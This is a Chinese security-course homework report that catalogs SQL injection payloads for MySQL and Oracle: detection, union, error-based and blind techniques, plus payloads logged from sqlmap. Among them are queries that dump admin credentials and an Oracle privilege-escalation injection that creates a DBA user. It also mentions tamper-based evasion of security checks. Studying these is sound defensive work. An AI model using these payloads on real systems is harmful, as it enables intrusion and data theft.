信安之路(第六周作业)-数据库相关注入语句的收集和学习
1、 收集网络上各种 sql 注入时使用的 payload 并理解其适用的环境(检测注入、利用注入)
收集如下:
整型注入——属于检测注入
输入and 1=1和and 1=2后页面是否有变化(无变化,说明不是整型注入)
and 1=1:
and 1=2:
字符注入——属于检测注入
输入‘and 1=1%23 和’and 1=2%23后页面是否有变化(有变化,说明存在字符注入)
回显注入——属于利用注入
MySQL:
判断字段数 ?id=1’ ORDER BY 3–+
判断显示位 ?id=-1’ UNION SELECT 1,2,3–+
解释:union用于合并两个或者多个select语句的结果集。
利用函数获得信息 ?id=-1 UNION SELECT 1,(version()),3–+
Oracle(参考文章:https://www.jianshu.com/p/af12401bbfd9):
判断列数:
’ order by 3 –
判断回显位置:
’ union select null,null,null from dual –
解释:dual是单行单列虚拟表,任何用户都可读取,常用在没有目标表的Select语句块中。
获取数据库版本信息:
’ union select null,(select banner from sys.v_$version where rownum=1),null from dual –
解释:返回版本信息的第一行
获取数据表名:
’ union select null,(select table_name from user_tables where rownum=1),null from dual –
’ union select null,(select table_name from user_tables where rownum=1 and table_name<>‘T_USER’),null from dual –
获取关键表中的列名:
’ union select null,(select column_name from user_tab_columns where table_name=‘T_USER’ and rownum=1),null from dual –
’ union select null,(select column_name from user_tab_columns where table_name=‘T_USER’ and column_name<>‘SUSER’ and rownum=1),null from dual –
’ union select null,(select column_name from user_tab_columns where table_name=‘T_USER’ and column_name<>‘SUSER’ and column_name<>‘SPWD’ and rownum=1),null from dual –
’ union select null,(select column_name from user_tab_columns where table_name=‘T_USER’ and column_name<>‘SUSER’ and column_name<>‘SPWD’ and column_name<>‘SNAME’ and rownum=1),null from dual –
获取关键列中的字段数据:
’ union select SNAME,SUSER,SPWD from T_USER –
提权为DBA(https://www.cnblogs.com/charie/articles/1240379.html):
select banner from sys.v_$version where rownum=1 and ‘’||SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(‘FOO’,‘BAR’,‘DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ‘‘DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ‘’’‘CREATE USER ORACLE IDENTIFIED BY fuckadmin’’’’;END;’’;END;–’,‘SYS’,0,‘1’,0)=’’–
解释:DBMS_EXPORT_EXTENSION函数允许PL/SQL注入,
select banner from sys.v_$version where rownum=1 and ‘’||SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(‘FOO’,‘BAR’,‘DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ‘‘DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ‘’’‘GRANT DBA,CONNECT TO ORACLE’’’’;END;’’;END;–’,‘SYS’,0,‘1’,0)=’’–
报错注入:
MySQL
——————————————————————————————————
(参考文章:https://blog.csdn.net/jpygx123/article/details/84191704):
数据库版本:
’ and (select 1 from (select count(*),concat((select version()),floor(rand()*2))a from information_schema.columns group by a)b)limit 0,1 --+
解释:
concat()——连接字符串
floor()——向下取整
information_schema——MySQL自带的信息数据库,存储了数据库元数据,如数据库名、表名等。
group by——根据一个或多个列对结果进行分组
limit——强制select语句返回指定的记录数
连接用户:
+and(select 1 from(select count(),concat((select (select (select concat(0x7e,user(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a)
解释:
0x7e——ascii对应的字符是~
连接数据库:
’ and (select 1 from (select count(*),concat((select database()),floor(rand()*2))a from information_schema.columns group by a)b)limit 0,1 --+
暴库:
+and(select 1 from(select count(),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a)
解释:
distinct——用于返回唯一不同的值
暴表:
+and(select 1 from(select count(),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a)
暴字段:
+and(select 1 from(select count(),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name=0x61646D696E LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a)
解释:
0x61646D696E——admin
暴内容:
+and(select 1 from(select count(),concat((select (select (SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a)
具体解释见https://yq.aliyun.com/articles/692723
ExtractValue(作用:使用XPath表示法从XML字符串中提取值,如果XPath格式语法书写错误,就会报错)报错注入:
+and extractvalue(1, concat(0x7e, (select @@version),0x7e))
+and extractvalue(1, concat(0x7e,(SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1)))
UpdateXml(作用:返回替换的XML片段,当XPath路径语法错误就会报错,报错内容含有错误的路径内容)报错注入:
+and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)
+and updatexml(1,concat(0x7e,(SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1),0x7e),1)
Exp报错注入(当传递一个大于709的值时,exp()会引起一个溢出错误):
and exp(~(select * from(select user())a))
Oracle
——————————————————————————————————
(参考文章:https://www.jianshu.com/p/af12401bbfd9):
使用utl_inaddr.get_host_name()进行报错注入-
’ and 1=utl_inaddr.get_host_name((select user from dual))—
解释:
url_inaddr用于取得局域网或Internet中的主机名和IP地址
使用ctxsys.drithsx.sn()进行报错注入-
’ and 1=ctxsys.drithsx.sn(1,(select user from dual))—
解释:
CTXSYS是 interMedia Text的用户,具有connect, resource,dba权限
使用XMLType()进行报错注入-
’ and (select upper(XMLType(chr(60)||chr(58)||(select user from dual)||chr(62))) from dual) is not null—
使用dbms_xdb_version.checkin()进行报错注入-
’ and (select dbms_xdb_version.checkin((select user from dual)) from dual) is not null—
使用dbms_xdb_version.makeversioned()进报错注入-
’ and (select dbms_xdb_version.makeversioned((select user from dual)) from dual) is not null—
使用dbms_xdb_version.uncheckout()进行报错注入-
’ and (select dbms_xdb_version.uncheckout((select user from dual)) from dual) is not null—
使用dbms_utility.sqlid_to_sqlhash()进行报错注入-
’ and (SELECT dbms_utility.sqlid_to_sqlhash((select user from dual)) from dual) is not null—
使用ordsys.ord_dicom.getmappingxpath()进行报错注入-
’ and 1=ordsys.ord_dicom.getmappingxpath((select user from dual),user,user)—
’ and 1=ordsys.ord_dicom.getmappingxpath((select banner from v$version where rownum=1),user,user)—
使用decode进行报错注入,这种方式更偏向布尔型注入,因为这种方式并不会通过报错把查询结果回显回来,仅是用来作为页面的表现不同的判断方法-
'and 1=(select decode(substr(user,1,1),‘S’,(1/0),0) from dual) –
盲注:
Mysql
——————————————————————————————————
延时盲注payload(参考文章:
https://maplege.github.io/2017/09/16/sleepBlandSQLInjection/):
得到正确的注入方式
?id=1’ and sleep(5) --+ 进行注入尝试,如果页面休眠5秒后返回,则证明该注入方式是可以使用的,sql语句已生效
?username=admin’ and if(1=2,1,sleep(10))#
判断数据库名
?id=1’ and if((select length(database())>7)>0,sleep(5),null) --+ 判断数据库长度是否大于7
?id=1’ and if((select ascii(substr(database(),1,1))>97)>0,sleep(5),null) --+ 判断数据库名的第一个字符ascii是否大于97
?id=1’ and if((select database())=“security”,sleep(5),null) --+ 判断数据库名是否为security,如果是则休眠5秒,否则立即返回
判断版本号
?id=1’ and if((select version()) like “10%”,sleep(5),null) --+ 判断版本号是否为10开头的(一般用5),如果是则休眠5秒
判断表名
?id=1’ and if ((select length(table_name)>4 from information_schema.tables limit 2,1)>0,sleep(5),null); --+ 判断第三个表的表名长度是否大于4
?id=1’ and if ((select substr(table_name,1,1) from information_schema.tables limit 2,1)=‘u’,sleep(5),null); --+ 判断第三个表的表名的第一个字母是否为u
判断列名
?id=1’ and if ((select length(column_name)>1 from information_schema.columns where table_schema=database() and table_name=“users” limit 0,1)>0,sleep(5),null); --+ 判断users表的第一列名的长度是否大于1
?id=1’ and if((select ascii(substr(column_name,1,1))>97 from information_schema.columns where table_schema=database() and table_name=“users” limit 0,1)>0,sleep(3),null)–+ 判断users表的第一列名的第一个字符ascii是否大于97
得到数据
?id=1’ and if((select length(username)>1 from users limit 0,1)>0,sleep(3),null)–+ 判断username列的第一条数据的长度是否大于1
?id=1’ and if((select ascii(substr(username,1,1))>65 from users limit 0,1)>0,sleep(3),null)–+ 判断username的第一条数据的第一个字符的ascii是否大于65
(参考文章:
http://www.admintony.com/MYSQL%E5%9F%BA%E4%BA%8E%E6%97%B6%E9%97%B4%E7%9A%84%E7%9B%B2%E6%B3%A8%E6%80%BB%E7%BB%93.html)
判断注入:
if(now()=sysdate(),sleep(6),0)/‘XOR(if(now()=sysdate(),sleep(6),0))OR’“XOR(if(now()=sysdate(),sleep(6),0))OR”/
查看用户名
payload:if(ascii(substr(user(),第几位,1))=114,sleep(3),1)
查看数据库
payload:if(ascii(substr(database(),1,1))=114,sleep(5),1)
查看mysql的版本
payload:if(ascii(substr(database(),1,1))=114,sleep(5),1)
暴表
union select if(ascii(substr(table_name,1,1))>97,sleep(5),1),2,3 from information_schema.tables where table_schema = database() limit 0,1
union select if(ascii(substr(user(),1,1))=114,sleep(5),1),2,3
暴列名
union select if(ascii(substr(column_name,1,1))=105,sleep(5),1),2,3 from information_schema.columns where table_name = ‘admin’ limit 0,1
暴数据
union select if(ascii(substr(user,1,1))=97,sleep(5),1),2,3 from admin limit 0,1
基于布尔盲注payload(参考文章:
https://maplege.github.io/2017/08/26/boolBlandSQLInjection/)
#判断当前数据库长度
?id=12’ and (select length(database())>5) --+
#判断当前数据库名
?id=12’ and (select ascii(substr(database(),1,1))>=97) --+
#判断第一个表的表长度
?id=12’ and (select length(table_name)>5 from information_schema.tables where table_schema=database() limit 0,1) --+
#判断第二个表名
?id=12’ and (select ascii(substr(table_name,1,1))>97 from information_schema.tables where table_schema=database() limit 1,1) --+
#判断users表的第一个字段长度
?id=12’ and (select length(column_name)>1 from information_schema.columns where table_schema=database() and table_name=‘users’ limit 0,1) --+
#判断users表的第一个字段名
?id=12’ and (select ascii(substr(column_name,1,1))>65 from information_schema.columns where table_schema=database() and table_name=‘users’ limit 0,1) --+
#判断username列的第一条数据长度
?id=12’ and (select length(username)>1 from users limit 0,1) --+
#判断username列的第一条数据
?id=12’ and (select ascii(substr(username,1,1))>=65 from users limit 0,1) --+
Oracle
參考文章:https://www.jianshu.com/p/af12401bbfd9
使用decode函数进行布尔盲注,substr(user,1,1)是条件,'S’是要遍历的位置,如果匹配便返回翻译值1,否则使用默认值0
http://10.10.10.110:8080/SqlInjection/selcet?suser=1&sname=1’and 1=(select decode(substr(user,1,1),‘S’,(1),0) from dual) –
使用instr进行布尔盲注,(select user from dual)是查询结果数据,instr会返回‘SQL’位置数据在,查询结果中的位置,未找到便返回0,可以通过对‘SQL’位置进行遍历和迭代,获取到数据。类似MYSQL regexp注入的方法。
http://10.10.10.110:8080/SqlInjection/selcet?suser=1&sname=1’and 1=(instr((select user from dual),‘SQL’)) –
2、 记录 sqlmap 的检测和利用过程中使用的 payload(也算一种 payload 收集方式)
收集如下:
)))’(")(()
.)"()).’,.
) AND 7447=7554—tMuJ
) AND 6343=6343—EsNa
’ AND 2449=2846—sUQj
’ AND 6343=6343—keJl
) AND 6343=6343 AND (7799=7799
) AND 6443=6343 AND (7799=7799
)) AND 9007=3471 AND ((7116=7116
)) AND 6343=6343 AND ((3202=3202
))) AND 6898=5624 AND (((1942=1942
))) AND 6343=6343 AND (((6838=6838
AND 6161=4494
AND 6343=6343
') AND 6343=6343 AND (‘iCym’=‘iCym
‘)) AND 3090=4959 AND ((‘lyJJ’=‘lyJJ
‘)) AND 5640=5640 AND ((‘LNeu’=‘LNeu
‘))) AND 1863=3401 AND (((‘mqtW’=‘mqtW
‘))) AND 5640=5640 AND (((‘yADD’=‘yADD
’ AND 5460=1068 AND ‘xQig’=‘xQig
") AND 8888=6425 AND (“gTmI” LIKE "gTmI
") AND 6343=6343 AND (“yBfl” LIKE "yBfl
" AND 5350=8435 AND “MzPm” LIKE "MzPm
" AND 6343=6343 AND “XPgX” LIKE "XPgX
%’) AND 7025=6144 AND (’%’=’
%’) AND 6343=6343 AND (’%’=’
") AND 8009=3368 AND (“YKVn”=“YKVn
%” AND 3836=3836—uOPt
%’) AND 6680=6680#
%’)) AND 6583=3749#
) RLIKE (SELECT (CASE WHEN (9597=7918) THEN 1 ELSE 0x28 END))—UosQ
)) RLIKE (SELECT (CASE WHEN (9062=5433) THEN 1 ELSE 0x28 END)) AND ((1878=1878
) AND MAKE_SET(6916=7532,7532)—TrWw
) AND (SELECT (CASE WHEN (9507=5382) THEN NULL ELSE CAST((CHR(99)||CHR(68)||CHR(119)||CHR(114)) AS NUMERIC) END)) IS NULL—MNJe
) AND (SELECT (CASE WHEN (1972=1972) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,1972) END) FROM DUAL) IS NULL—UlcH
(SELECT (CASE WHEN (6130=7365) THEN 6130 ELSE 1/(SELECT 0) END))
,(SELECT (CASE WHEN (3636=3636) THEN 1 ELSE 3636*(SELECT 3636 FROM INFORMATION_SCHEMA.PLUGINS) END))
,(SELECT (CASE WHEN (3805=8869) THEN 1 ELSE 3805*(SELECT 3805 FROM INFORMATION_SCHEMA.PLUGINS) END))
,(SELECT (CASE WHEN (1059=6489) THEN 0x74657374 ELSE 1059*(SELECT 1059 FROM INFORMATION_SCHEMA.PLUGINS) END))
',(SELECT (CASE WHEN (4165=4165) THEN 0x74657374 ELSE 4165*(SELECT 4165 FROM INFORMATION_SCHEMA.PLUGINS) END))—Gclh
(CASE WHEN 2693=2693 THEN ‘test’ ELSE NULL END) test是该处字段的值
(CASE WHEN 2294=9587 THEN ‘test’ ELSE NULL END) 同上
(CASE WHEN 2361=2361 THEN 2361 ELSE NULL END)
(CASE WHEN 4605=9403 THEN 4605 ELSE NULL END)
(CASE WHEN (2476=2476) THEN ‘test’ ELSE 2476*(SELECT 2476 FROM DUAL UNION SELECT 9552 FROM DUAL) END)
(CASE WHEN (3224=9430) THEN ‘test’ ELSE 3224*(SELECT 3224 FROM DUAL UNION SELECT 9430 FROM DUAL) END)
(CASE WHEN (9315=9315) THEN 9315 ELSE 9315*(SELECT 9315 FROM DUAL UNION SELECT 9208 FROM DUAL) END)
IIF(9481=9481,9481,1/0)
IIF(1125=8808,1125,1/0)
(SELECT (CASE WHEN (9081=9081) THEN 9081 ELSE 1/0 END) FROM SYSMASTER:SYSDUAL)
(SELECT (CASE WHEN (9198=9198) THEN 9198 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)
(SELECT (CASE WHEN (1471=1471) THEN 1471 ELSE 1471*(SELECT 1471 UNION ALL SELECT 9858) END))
(SELECT (CASE WHEN (6493=7523) THEN 6493 ELSE 6493*(SELECT 6493 UNION ALL SELECT 7523) END))
);IF(6378=8135) SELECT 6378 ELSE DROP FUNCTION Szmn—
) AND (SELECT 7068 FROM(SELECT COUNT(*),CONCAT(0x71626a6b71,(SELECT (ELT(7068=7068,1))),0x7170707671,FLOOR(RAND(0)2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)—ozhS
) AND EXTRACTVALUE(9024,CONCAT(0x5c,0x71626a6b71,(SELECT (ELT(9024=9024,1))),0x7170707671))—QRwG
) AND UPDATEXML(1127,CONCAT(0x2e,0x71626a6b71,(SELECT (ELT(1127=1127,1))),0x7170707671),4495) AND (8401=8401
) AND ROW(2651,6055)>(SELECT COUNT(),CONCAT(0x71626a6b71,(SELECT (ELT(2651=2651,1))),0x7170707671,FLOOR(RAND(0)2))x FROM (SELECT 5557 UNION SELECT 6082 UNION SELECT 5642 UNION SELECT 7878)a GROUP BY x)—SaxV
) AND 7443=CAST((CHR(113)||CHR(98)||CHR(106)||CHR(107)||CHR(113))||(SELECT (CASE WHEN (7443=7443) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(112)||CHR(118)||CHR(113)) AS NUMERIC)—YMDR
) AND 3570 IN (SELECT (CHAR(113)+CHAR(98)+CHAR(106)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (3570=3570) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(112)+CHAR(118)+CHAR(113))) AND (7075=7075
'))) AND 3570 IN (SELECT (CHAR(113)+CHAR(98)+CHAR(106)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (3570=3570) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(112)+CHAR(118)+CHAR(113))) AND (((‘xbVj’='xbVj
) AND 1426=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(106)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (1426=1426) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(112)+CHAR(118)+CHAR(113))) AND (9532=9532
) AND 2168=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(106)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (2168=2168) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(112)||CHR(118)||CHR(113)||CHR(62))) FROM DUAL)—ghfH
) AND 6865=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(98)||CHR(106)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (6865=6865) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(112)||CHR(118)||CHR(113)) AND (4852=4852
)) AND 3058=CTXSYS.DRITHSX.SN(3058,(CHR(113)||CHR(98)||CHR(106)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (3058=3058) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(112)||CHR(118)||CHR(113))) AND ((2596=2596
) AND 9306=(‘qbjkq’||(SELECT CASE 9306 WHEN 9306 THEN 1 ELSE 0 END FROM RDB$DATABASE)||‘qppvq’) AND (8378=8378
) PROCEDURE ANALYSE(EXTRACTVALUE(3047,CONCAT(0x5c,0x71626a6b71,(SELECT (CASE WHEN (3047=3047) THEN 1 ELSE 0 END)),0x7170707671)),1)—dmiu
(SELECT 1803 FROM(SELECT COUNT(),CONCAT(0x71626a6b71,(SELECT (ELT(1803=1803,1))),0x7170707671,FLOOR(RAND(0)2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
(EXTRACTVALUE(9989,CONCAT(0x5c,0x71626a6b71,(SELECT (ELT(9989=9989,1))),0x7170707671)))
',(SELECT 9804 FROM(SELECT COUNT(),CONCAT(0x71626a6b71,(SELECT (ELT(9804=9804,1))),0x7170707671,FLOOR(RAND(0)2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)—Pken
',(SELECT 8906 FROM (SELECT ROW(8906,7318)>(SELECT COUNT(),CONCAT(0x71626a6b71,(SELECT (ELT(8906=8906,1))),0x7170707671,FLOOR(RAND(0)*2))x FROM (SELECT 7404 UNION SELECT 7246 UNION SELECT 9305 UNION SELECT 8758)a GROUP BY x))s)—OvoP
)));SELECT SLEEP(5)#
);(SELECT * FROM (SELECT(SLEEP(5)))IQnm)#
)));SELECT PG_SLEEP(5)—
);CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS ‘/lib/libc.so.6’,‘sleep’ language ‘C’ STRICT; SELECT sleep(5)—
));WAITFOR DELAY ‘0:0:5’—
);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(105)||CHR(111)||CHR(97),5) FROM DUAL—
’ AND ELT(2169=2169,SLEEP(5))—VOSq
) AND 1377=DBMS_PIPE.RECEIVE_MESSAGE(CHR(71)||CHR(72)||CHR(103)||CHR(86),5)—Aojg
BEGIN IF (5532=5532) THEN DBMS_LOCK.SLEEP(5); ELSE DBMS_LOCK.SLEEP(0); END IF; END;
) ORDER BY 1—IFWK
) UNION ALL SELECT NULL,NULL,NULL,NULL—HaXG
-5362 UNION ALL SELECT 2771,2771,2771,2771,2771,2771,2771,2771,2771#
3、理解以上涉及的 sql 语句的意思,其中会涉及不同的数据库、不同注入场景,可以将学习的过程和收集的方式进行整理形成报告,关于 payload 的理解,其中会涉及之前学习的基础。
扩展学习:理解 sqlmap 自带 tamper 的原理,这里通常包含很多数据库的特性,从而实现 payload 变形啥的,用来绕过一些简单的安全检测
相关问题
1、本次学习还是围绕数据库进行,两个重点:
一、通过网络进行信息收集,尽可能多的收集网络上公开的有关 sql 注入涉及到的注入 payload,来源可以是:文章中涉及的、github 上某些工具中提供的、某些成品工具中携带的(比如:sqlmap)
二、理解这些 payload 中涉及的数据库使用的难点理解,比如:某些特殊字符在数据库中的作用,之前学习的功能函数在实际注入中的应用、可能存在一些在之前学习中未涉及的数据库功能和特性等
2、学完这些基础之后,可以去理解理解 sqlmap 中自带的一些 tamper 的原理,以及如何编写 tamper,作为扩展训练,有能力的可以研究研究。
3、本次重点不在 sqlmap 的学习,还是基于数据库的学习,通过这个任务,可以锻炼大家的信息收集能力,扩展信息收集的各种方式,巩固之前的学习基础,扩展一些之前未学到的东西。
4、我上传的一些 payload 也是来自于 github 的某些工具中带的 fuzz 字典,学习的方式不是每一个 payload 都去理解,去实践,因为 fuzz 技术就是在未知的情况下,变换各种方式去尝试,不需要每一个 payload 都去思考其场景,模拟其场景,主要还是学习其中的基础,能够做到每一个 payload 中涉及的字符、函数、语句都能理解就够了。
5、关于 sqlmap 中的 payload 如何获取,本身是开源软件,能力强的可以去看代码,从中提取,一劳永逸的方式, 也是可以获取很多闭源产品 payload 的方式,就是部署一个 web 环境,然后设置环境记录所有访问记录,包括 GET、POST、HEAD 等情况,然后用扫描器进行目标扫描,在扫描完成之后,将日志拿出来,分析即可。